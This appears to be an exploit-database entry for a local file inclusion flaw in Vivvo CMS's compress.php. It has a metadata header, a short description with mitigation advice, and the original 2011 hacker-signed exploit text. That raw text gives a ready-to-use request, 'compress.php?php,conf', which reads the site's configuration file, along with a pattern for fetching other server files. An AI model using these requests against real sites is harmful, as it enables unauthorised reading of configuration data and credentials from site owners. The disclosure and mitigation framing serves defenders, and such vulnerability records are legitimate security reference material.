Vivvo CMS - Local File include

vendor:

Vivvo CMS

by:

JaBrOtxHaCkEr

9.3

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Vivvo CMS

Affected Version From: v4.5

Affected Version To: All

Patch Exists: YES

Related CWE: N/A

CPE: a:vivvo:vivvo_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Vivvo CMS – Local File include

Vivvo CMS is an intuitive content management system atop a powerful programming framework, empowering numerous industry leading online newspapers, magazines, journals, TV and radio stations. The vulnerability exists in the compress.php file, which allows an attacker to include arbitrary files from the server. An attacker can exploit this vulnerability by sending a crafted request to the server with the malicious file name as a parameter. This will allow the attacker to execute arbitrary code on the server.

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the compress.php file and ensure that the file is not accessible from the web. Additionally, it is recommended to update the Vivvo CMS to the latest version.

Source

Exploit-DB raw data:

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Exploit Title: Vivvo CMS - Local File include    !
D0rk: Find YourSelf =)                           !
Date: Sun, 02 Oct 2011 11:55:00 =)               !
Author: JaBrOtxHaCkEr                            !
E~mail My ^ v7_@hotmail.com ^                    !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

#
Vulnerable SOftware:
#

********************************************************************
Vivvo CMS is an intuitive content management system atop a powerful programming
framework, empowering numerous industry leading online newspapers, magazines,
journals, TV and radio stations.
********************************************************************

********************************************************************
W3B : www.vivvo.net
Vr$i0n: v4.5 Or All
********************************************************************
Err0r In

File : compress.php?(css),file/namecss

Expl0it : site.com/compress.php?php,conf

# conf.php ~ (conf) (php) "site.com/compress.php?(php),(conf)"

File extension : TXT , PHP , css , rs , ..... all

site.com/compress.php?( ? ),filename


###############################################################
GrEetz To : HaCkEr KsA ~ iNjeCt ~ dEV!L-nEt ~ p0c.cc ~ Tryag.cc ~ v99x.com ~ All Friends My :$ <3